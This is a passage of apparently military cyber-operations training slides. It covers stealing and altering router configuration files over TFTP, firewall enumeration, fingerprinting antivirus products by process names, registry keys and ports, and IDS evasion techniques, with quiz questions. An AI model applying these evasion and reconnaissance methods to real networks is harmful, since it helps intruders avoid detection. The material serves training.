is typically stored in the NVRAM; the contents are retained after reboot. The Startup configuration is also the configuration that is ran when the device is booted up. − Running Configuration Files or "Running config" are where the router stores configuration changes while the router is running. The run config file is NOT persistent, this means that changes that are made to the run config file, while the router is running, are NOT retained after reboot. The run config file can be saved to either NVRAM or a TFTP (Trivial File Transfer Protocol) server if a TFTP server exists on the network. Startup and Run configuration files are some of the most important files that can be collected from a target router. An attacker can collect these files through TFTP. The attacker can modify these files to change routes and ACL accommodations, which in turn can provide increased or enhanced access to the network. After modification is done, these files can be TFTP’d back to the router. CHECK ON LEARNING Are Startup Configuration files considered to be persistent or non-persistent? CHECK ON LEARNING (True or False) Router configuration files are prime targets when conducting router collection? Firewall Enumeration The main goal of any firewall is to prevent uninitiated traffic from entering the network. Because firewalls protect the network by filtering or limiting the traffic between trusted and untrusted networks, firewall enumeration is an important aspect of the attack plan when planning to attack any target network. When firewalls are effectively identified, known vulnerabilities can then be associated with them. There are multiple ways to go about enumerating firewalls. − A simple traceroute can be used to identify and confirm that a firewall is on the network, while port scanning and banner grabbing can identify vendor specific information. Traceroutes are often employed as a means to identify firewalls and other packet filtering devices on a target network, as well as the hosts that it protects, which sit behind it. When asterisks(*) are present when the results of a traceroute are returned, it may likely represent a firewall, packet filtering device or may be severe network latency. Firewall Enumeration Every firewall has unique characteristics that can assist in identification. Port scans can reveal open ports on a network that may be associated with a specific firewall. These associated known ports are often used in order to enable remote administration. − Various vendors will use specific ports that are tied to their firewall products and services. These ports can be cross referenced and reveal a firewall, as well as its manufacturer. Nmap can be a very useful tool when enumerating firewalls and packet filtering devices on a targeted network. − Running a TCP SYN Stealth Scan(-sS) or a TCP Connect Scan(-sT) will return filtered ports. − When running an Nmap scan against a target network, packet filtering devices that exist on the network will absorb or drop incoming packets and will not return a SYN/ACK or an RST flag. Firewalls create banners on applications as well as deny statements. − These banners contain information that is specific to the firewall, like the firewall vendor and version. Because of this specific content within these banners, the method of banner grabbing can be a very effective enumeration method when attempting to identify firewalls. Firewall Enumeration Fire walking is an active reconnaissance process, utilizing the Firewalk tool, which allows an attacker to gain a better understanding as to what protocols a firewall will allow. − This method will determine the movement of a packet from a untrusted source and to a protected host through the firewall. − There are two main uses for fire walking, identifying and enumerating hosts that live within the protected network, and identifying ports that are accessible through the firewall. Firewall Enumeration The Firewalk tool conducts the process of fire walking by using a technique based off of a traceroute and TTL values. The Fire Walk tool will send out TCP or UDP packets that have one hop greater than that of the gateway. − If the gateway allows the packet the traffic to pass it will then forward to the next hop, where it then expires and presents a ICMP_TIME_EXCEEDED error message. − Because one of the main goals is to identify and enumerate hosts within the secure perimeter of the network, Fire Walk will raise the hop counts in an attempt to obtain the right IP TTL that will allow a packet to expire one hop behind the gateway. Once this process is completed and Fire Walk correctly identifies the hop of the gateway it will then start scanning. CHECK ON LEARNING What tool uses a technique that is similar to traceroutes, in order to identify hosts that sit beyond a firewall? CHECK ON LEARNING (True or False) The ping scan (-sP) to return filtered ports? Host Based Security Enumeration Concepts V1.3: 08/25/23 OBJECTIVES Identify McAfee Internet Security Identify Symantec Endpoint Protection Identify Kaspersky Internet Security Describe Intrusion Detection System (IDS) Enumeration Describe IDS Evasion Techniques Describe Characteristics of Host-Based Security Products Describe Characteristics of Network Intrusion Prevention System (NIPS) TLO KNOWLEDGE AND SKILLS Conditions: Given a classroom, applicable references, and a practical exercise, the Cyber Mission Force student will demonstrate an understanding of host security enumeration concepts. Knowledge: Identify the different types of security packages that are available Understand enumeration and evasion and why both are critical to host security Skills: Knowledge of how to detect intrusions and attacks on a host Anti-Malware and Anti-Virus Software Anti-virus and Anti-malware are two different types of programs that mitigate exposure to viruses and other types of malicious software. As we already know, all viruses are malware, but not all malware is a virus. This is an important fact, because these programs perform different things. − Anti-virus is software utility that is designed to specifically defend AGAINST viruses, and prevents viruses from infecting corrupting the system. Antivirus software will frequently scan the system that it is installed on in search of viruses that may have infected it. If any viruses are identified by the antivirus software, it will then take action by quarantining the virus and removing it from the system. − Anti-malware software however, is VERY similar to antivirus software, though as the name suggests it’s main goal is to defend against ALL MALWARE, this includes viruses, as well as trojans, rootkits, bots, spyware, ransomware, etc. Anti-Malware and Anti-Virus Software McAfee Internet Security (Anti-Malware Software): − McAfee provides continuous protection against threats like viruses, ransomware, and even phishing attacks (more accurately, some of the malware that the exists within the links and attachments of phishing emails). − We can use common processes that are associated with McAfee, in order to identify when it is running on a targeted device. Anti-Malware and Anti-Virus Software The following information below are indicators of McAfee running on a targeted device: Processes: Directory Structures: Associated Ports: − McScript.exe − UpdaterUI.exe/UdateUI.exe C:\Program Files\McAfee\ Port 6646 − naPrsMgr.exe Port 8081 C:\Program Files\Common Files\McAfeeData − FrameworkService.exe (open if sending logs to ePO server − Cleanup.exe − CmdAgent.exe C:\Program Files\Common Files\McAfee − McScrip_InUse.exe − McTray.exe Registry Keys: − HKLM\SOFTWARE\McAfee Anti-Malware and Anti-Virus Software Symantec Endpoint Protection: − Symantec Endpoint Protection is an anti-malware and firewall solution, designed specifically for servers and workstations. − The main goal for SEP is to reduce attack surfaces, prevent attacks and breaches, as well as detect and respond to attacks. − SEP provides flexibility through the ability to be configured as a cloud-based, on-premise or hybrid implementation. − Symantec Endpoint Protection provides intrusion prevention, file behavior monitoring and defends servers and workstations against malware, to include Zero-Day Attacks. Anti-Malware and Anti-Virus Software The following information below are indicators of Symantec Endpoint Protection (Anti-Malware Software) running on a targeted device: Processes: Directory Structures: Registry Key: − SymCorpUI.exe C:\Program Files\Common Files\Symantec HKLM\SOFTWARE\Symantec\Symantec − Semsvc.exe Endpoint Endpoint − ccSvcHst.exe − ccApp.exe − LUALL.exe − SMC.exe − SMCgui.exe − Rtvscan.exe − LuComServer.exe − ProtectionUtilSurrogate.exe SEP opens various ports depending on enabled features, making it difficult to ID via port scan Anti-Malware and Anti-Virus Software Kaspersky Internet Security, is endpoint security software developed by Kaspersky Lab, that protects against viruses, trojans, works, rootkits, keyloggers, man-in-the-middle attacks, sophisticated botnets and other threats to endpoint devices. − Kaspersky provides proactive detection through frequent scanning, blocks threats before they occur and if it detects an immediate threat, it will then quarantine and remove it from the system. Kaspersky Internet Security also prevents email spam, phishing attempts and data leaks. Anti-Malware and Anti-Virus Software The following information below are indicators of Kaspersky Internet Security (Anti-Malware Software) running on a targeted device: Processes: − avp.exe Registry Keys: − HKLM\SOFTWARE\KasperskyLab Directory Structure: − C:\Program Files\Kaspersky Lab\Kaspersky Internet Security Kaspersky Internet Security is known to open a port listener on: − Port 1110 CHECK ON LEARNING What type of software protects against viruses, rootkits, trojans, worms and other harmful software? CHECK ON LEARNING (True or False)Malware and Viruses are synonymous? Characteristics of Host-Based Security Products A host is any type of hardware that is capable of permitting access to a network. A host can provide this capability through a user interface, specialized software, network address, protocol stack or other means. Because of the increase in attack surfaces, network engineers and administrators, and the network security/cybersecurity industry as a whole, has taken notice of the vulnerabilities that surround hosts and the dangers they pose to the network. − To protect against these threats, today many host devices on a network utilize Host-Based Intrusion Detection Systems (HIDS) and Host-Based Intrusion Prevention Systems (HIPS). Characteristics of Host-Based Security Products Host-Based Intrusion Detection Systems monitor and analyze the internal operations of the system that it is installed on, analyzes the traffic on its network interfaces and logs any malicious behavior that it identifies. HIDS provide deep visibility into the happenings of critical systems. − HIDS solely identify malicious behavior and DO NOT act on this information in a capacity that would prevent an attack from occurring, hence the name "Intrusion Detection". Characteristics of Host-Based Security Products Host-Based Intrusion Prevention Systems (also sometimes referred to as end-point security) essentially play a very similar role to their HIDS counterparts, and that is for good reason. − HIPS will also monitor, log and alert malicious behavior that occurs on a system like a HIDS would; the key difference though is that the HIPS attempts to block intrusions and limits damage to the system and then reports intrusion attempts. Characteristics of Host-Based Security Products Security Information and Event Management(SIEM) Is a type of software security solution that aggregates log and event data that is generated from live IDS and IPS data, organization applications, security devices and host systems, and brings it into a centralized location. The SIEM sorts this aggregated information into various categories, such as malware activity and failed/successful logins. − When the SIEM identifies anything that deviates from normal behavior, it will send an alert and suggests appropriate actions to remediate the possible threat. Numerous functions built into SIEMS, like incident management, reporting and dashboards provide a comprehensive view of the overall security of the environment. CHECK ON LEARNING What security device or application provides management, reporting and dashboards provide a comprehensive view of the overall security of the environment? CHECK ON LEARNING (True or False)Host-Based Intrusion Detection Systems include threat remediation countermeasures? Characteristics of Network-Based Security Products To defend the network against threats, network engineers and administrators utilize Network- Based Intrusion Detection Systems(NIDS) and Network-Based Intrusion Prevention Systems(NIPS). Network-Based Intrusion Detection Systems(NIDS) are passive devices that typically require a promiscuous network and monitor and analyze all traffic, to include unicast traffic, that is on a network, searching for any malicious activity. − Because NIDS are passive in their security role they might sit on the inner side of the network firewall, on the DMZ, or on the WAN side. − When placed either on the DMZ or the inner network, it will make less noise. − On a typical network NIDS sniffs the internal interface of the firewall in a read-only mode and sends an alert to the NIDS server on a different network interface if it detects malicious or suspicious activity. It does NOT act on this information. Characteristics of Network-Based Security Products Network-Based Intrusion Prevention Systems(NIPS) are far more active in their approach to network security. − Upon detecting malicious or suspicious activity, NIPS will take an active role in effort to secure the network. − NIPS is considered an inline security solution because it sits between the firewall and the rest of the network. − The NIPS provides a defensive layer of protection, in addition to the firewall, not instead of it. − If the NIPS identifies suspicious or malicious activity matches a signature or anomaly the NIPS will then shoot down the traffic by forging TCP RST segments to the source destination, or sending ICMP port, host or network unreachable to the source. CHECK ON LEARNING (True or False) NIDS are considered an inline network security solution? CHECK ON LEARNING What type of network security device sits between the firewall and the rest of the network? Intrusion Detection System Enumeration Most IDSs utilize central monitoring systems and network sensors that will communicate over various ports. These ports are key to enumerating IDSs and to possibly identify different types of IDS that are implemented within a target device or operate on a target network. − The known associated/common port numbers for an IDS, can provide great insight as to what IDSs a target may be using on their devices and/or network. − When you run a port scan on a target, the results can be cross-referenced with these known associated ports in order to enumerate and identify the IDS that is running on the targets infrastructure. Intrusion Detection System Enumeration Below is a list of popular IDSs and the associated ports and protocols: − Internet Security Systems: Real Secure Port 907/tcp (Real Secure Sensor) Port 903/tcp (Real Secure Console) Port 2998/tcp/udp (Real Secure Sensor) − Secure Net: Secure Net Pro Port 974/tcp (Secure Net Pro Console) Port 975/tcp (Secure Net Pro Sensor) − Network Flight Recorder: NFR Port 2010/tcp (Network Flight Recorder Sensor) − Axent: Netprowler Port 61440/tcp (Axent NetProwler Manager) Port 61441/tcp (Axent NetProwler Sensor) − Cisco: Cisco IDS/Net Ranger Port 45000/tcp/udp (Communicates to the "director"/console from the sensor) (Now obsolete, but still may be seen) − Enterasys: Dragon IDS Port 9111/tcp (Dragon IDS Console) Note: These Ports Are Subject To Change Intrusion Detection System Enumeration Note: Everything to the left of the firewall is considered to be “Public Facing”. Everything to the left is the private network. The Internal security devices, on both the network and the host are monitored by the SIEM. CHECK ON LEARNING What can be used to enumerate IDSs that may be used by a target? CHECK ON LEARNING Conducting what activity can allow for the enumeration and identification of the type of IDS used by a target? IDS Evasion Techniques In offensive cyber operations, it is important to remain undetected in order for most operations to be successful. There are several techniques that allow the attacker to exploit a target without drawing any attention from an IPS or IDS that may exist on a targeted network or host. The first evasion technique is a basic one, Denial of Service. − The basic core function of any DOS attack is to simply deny service. The goal specifically for evading IDS/IPS devices is to overload and ideally crash the device, rendering ineffective and no longer being able to identify or prevent an intrusion. If it doesn’t work, it can’t find us! Evasion takes place when a malicious packet is accepted by the target host but is rejected by the IDS. There are multiple types of evasion attacks, namely Fragmentation, Established, Pattern Change, Out-of-Order Sequencing, and Obfuscation. IDS Evasion Techniques Fragmentation: − IDS' compare exploits with a well known exploit signature. In order to evade the IDS, an attacker can break up an exploit into fragmented frames. − IDS' do not typically have enough memory storage to adequately store the packets and/ or reassemble them when comparing against a known signature. This vulnerability allows packets to get through. IDS Evasion Techniques IDS Evasion Techniques Established: − This technique manipulates a three-way handshake when establishing a connection with a target. The attacker will initiate the handshake with a SYN flag set, while also including part of the attack payload. When the attacker completes the handshake, the rest of the payload is then sent in the next packet. − In this example, the IDS did not pick up the data in the initial packet, instead the target host stored it. The target then receives the rest of the payload and then reassembles the attack payload in its entirety. This allows for the payload to reach the target without tripping the IDS. IDS Evasion Techniques Established: IDS Evasion Techniques Pattern Change: − IDS' store pieces of known exploit signatures that they use to compare against and match any exploits that they may detect. − The rules for these known exploit signatures are usually open-source. − Attackers can use this information to modify these known signatures in such a way that will allow the exploit to be undetectable when the IDS compares it against a known signature, while still carrying out the effects of the original exploit. IDS Evasion Techniques Pattern Change: IDS Evasion Techniques Out-of-Order Sequencing − The TCP sequence and the acknowledgment numbers let the IDS know that packets are received and are reassembled in the appropriate order. The Out-of-Order Sequencing technique seeks to evade the IDS by sending the exploit out of order. − If the IDS is unable to reassemble the out of sequence packets into the appropriate order, it is not able to compare the exploit with a known signature. IDS Evasion Techniques IDS Evasion Techniques Obfuscation: − The goal of obfuscation is to encapsulate an exploit with Unicode, encryption, or ASCII shellcode and masks it within the application. − This method is typically used in web server attacks, where the exploit is submitted through the URL. − IDS' cannot decode hex equivalent characters within the URL, effectively masking the exploit and allowing it to go undetected. IDS Evasion Techniques CHECK ON LEARNING Obfuscation works as an evasion technique because IDS’ cannot decode what? CHECK ON LEARNING What type of attack takes place when a malicious packet is accepted by the target host, but is then rejected by the IDS ?

combined_security.pdf

Document Details

Tags

Related

Full Transcript

Upgrade to continue